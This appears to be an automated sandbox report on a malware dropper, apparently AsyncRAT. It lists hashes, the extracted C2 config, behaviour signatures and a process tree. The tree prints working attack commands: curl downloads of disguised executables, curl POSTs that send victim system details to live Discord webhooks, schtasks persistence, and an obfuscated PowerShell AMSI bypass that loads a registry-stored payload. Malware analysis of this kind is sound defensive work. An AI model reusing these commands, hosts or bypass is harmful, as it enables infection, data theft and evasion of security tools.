Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-06-2024 08:13

General

  • Target

    Dropper.exe

  • Size

    13KB

  • MD5

    b893cd6a15c7c066afed84a3cfbb5367

  • SHA1

    8b147ed2063ffea51ebd884d476410541405ef95

  • SHA256

    6207d9cf72b8a1a656ebec2a1aac8476cea35ee877895bd788c2e4998aca6920

  • SHA512

    e1299e328d33243cb52d11dbff2c04903f54409d0e6b2f855ad7af18c3c34d619482db67800dd1a49bf2c6db816e3f86c52619c2a538b455e800841cc5209733

  • SSDEEP

    384:QMEPpIezni333CSlPmbptz6RLZLf+pfolcfAhDBVCs0:ipdm33CSIbD0LHGAhDBws0

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:380
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{a53ab144-4da8-4c4f-b63d-369aefbb2f9f}
          2⤵
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2324
          • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
            "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5432
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
              4⤵
                PID:5552
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  5⤵
                    PID:5672
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
                    5⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:5724
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp55AD.tmp.bat""
                  4⤵
                    PID:5640
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      5⤵
                        PID:5632
                      • C:\Windows\system32\timeout.exe
                        timeout 3
                        5⤵
                        • Delays execution with timeout.exe
                        PID:1512
                  • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                    "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
                    3⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5492
                    • C:\Windows\System32\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
                      4⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:5220
                  • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                    "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                    3⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:5532
              • C:\Windows\system32\lsass.exe
                C:\Windows\system32\lsass.exe
                1⤵
                  PID:668
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                  1⤵
                    PID:960
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                    1⤵
                      PID:428
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                      1⤵
                        PID:1028
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        1⤵
                          PID:1092
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1112
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            1⤵
                            • Drops file in System32 directory
                            PID:1156
                            • C:\Windows\system32\taskhostw.exe
                              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                              2⤵
                                PID:2884
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HeWSGUwasAkj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SAHXKyuHBCUUIO,[Parameter(Position=1)][Type]$PXrhhtYeoZ)$tBAQkevvddA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+'e'+'c'+''+[Char](116)+''+[Char](101)+'dD'+'e'+''+'l'+''+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+'a'+'te'+'T'+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'ic,'+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+'e'+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+'u'+'t'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$tBAQkevvddA.DefineConstructor('R'+[Char](84)+'S'+'p'+'e'+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+'e'+''+','+''+'H'+'id'+'e'+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$SAHXKyuHBCUUIO).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'nag'+[Char](101)+'d');$tBAQkevvddA.DefineMethod(''+[Char](73)+'nv'+[Char](111)+'ke',''+[Char](80)+'u'+[Char](98)+''+'l'+'i'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+'o'+'t'+',V'+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PXrhhtYeoZ,$SAHXKyuHBCUUIO).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+'ime,M'+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $tBAQkevvddA.CreateType();}$xnvvxLTiJQOXC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('Mic'+'r'+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+'f'+'e'+'N'+''+[Char](97)+''+[Char](116)+''+'i'+'v'+'e'+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+'o'+[Char](100)+''+'s'+'');$FoKgyPcTKGGDgP=$xnvvxLTiJQOXC.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+'dr'+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+''+'a'+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fOYBLkSacaIGdjuycAG=HeWSGUwasAkj @([String])([IntPtr]);$KCPdLPNBCvYJRhkylYtqDg=HeWSGUwasAkj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MfHGHLsTeIH=$xnvvxLTiJQOXC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+'l')));$JCHzhTtDigSjuX=$FoKgyPcTKGGDgP.Invoke($Null,@([Object]$MfHGHLsTeIH,[Object]('L'+[Char](111)+''+'a'+''+'d'+'L'+[Char](105)+''+'b'+''+'r'+''+'a'+''+'r'+''+'y'+'A')));$yBzlPdPptfhPeQCdx=$FoKgyPcTKGGDgP.Invoke($Null,@([Object]$MfHGHLsTeIH,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$kXiOWfd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JCHzhTtDigSjuX,$fOYBLkSacaIGdjuycAG).Invoke(''+[Char](97)+'ms'+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$cSKcISETBxUbWkpYK=$FoKgyPcTKGGDgP.Invoke($Null,@([Object]$kXiOWfd,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+'u'+'f'+''+'f'+''+'e'+''+[Char](114)+'')));$PniZIwbcua=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yBzlPdPptfhPeQCdx,$KCPdLPNBCvYJRhkylYtqDg).Invoke($cSKcISETBxUbWkpYK,[uint32]8,4,[ref]$PniZIwbcua);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cSKcISETBxUbWkpYK,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yBzlPdPptfhPeQCdx,$KCPdLPNBCvYJRhkylYtqDg).Invoke($cSKcISETBxUbWkpYK,[uint32]8,0x20,[ref]$PniZIwbcua);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
                                2⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:4524
                              • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3808
                              • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                2⤵
                                • Executes dropped EXE
                                PID:5688
                              • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                2⤵
                                • Executes dropped EXE
                                PID:4108
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                              1⤵
                              • Drops file in System32 directory
                              PID:1176
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1300
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                1⤵
                                  PID:1316
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1376
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1408
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                      1⤵
                                        PID:1492
                                        • C:\Windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:2584
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1572
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                            1⤵
                                              PID:1584
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1648
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                1⤵
                                                  PID:1720
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1760
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1780
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1864
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                        1⤵
                                                          PID:1964
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:1960
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                            1⤵
                                                              PID:1008
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                              1⤵
                                                                PID:1188
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                1⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1708
                                                              • C:\Windows\System32\spoolsv.exe
                                                                C:\Windows\System32\spoolsv.exe
                                                                1⤵
                                                                  PID:2124
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2268
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2344
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2592
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2608
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2628
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2776
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2816
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:2836
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2844
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2860
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2868
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3096
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3436
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:3516
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
                                                                                        2⤵
                                                                                        • Checks computer location settings
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3736
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3792
                                                                                          • C:\Windows\SysWOW64\curl.exe
                                                                                            curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                            4⤵
                                                                                              PID:3848
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                            3⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1592
                                                                                            • C:\Windows\SysWOW64\curl.exe
                                                                                              curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                              4⤵
                                                                                                PID:5092
                                                                                            • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
                                                                                              3⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:800
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3708
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
                                                                                                  5⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4720
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp34D6.tmp.bat""
                                                                                                4⤵
                                                                                                  PID:3592
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    timeout 3
                                                                                                    5⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:2280
                                                                                                  • C:\Users\Admin\AppData\Roaming\$77-aachost.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\$77-aachost.exe"
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4992
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: PXHSTPPU\nSystem Architecture: 64-bit\nHWID: 7C01AE9F5B3A50A64BF4\nUser HWID: S-1-5-21-3665033694-1447845302-680750983-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl
                                                                                                      6⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1452
                                                                                                      • C:\Windows\system32\curl.exe
                                                                                                        curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: PXHSTPPU\nSystem Architecture: 64-bit\nHWID: 7C01AE9F5B3A50A64BF4\nUser HWID: S-1-5-21-3665033694-1447845302-680750983-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl
                                                                                                        7⤵
                                                                                                          PID:2068
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                  3⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3936
                                                                                                  • C:\Windows\SysWOW64\curl.exe
                                                                                                    curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                    4⤵
                                                                                                      PID:4944
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
                                                                                                    3⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3712
                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
                                                                                                      4⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:4752
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                    3⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3612
                                                                                                    • C:\Windows\SysWOW64\curl.exe
                                                                                                      curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                      4⤵
                                                                                                        PID:1128
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4392
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                      3⤵
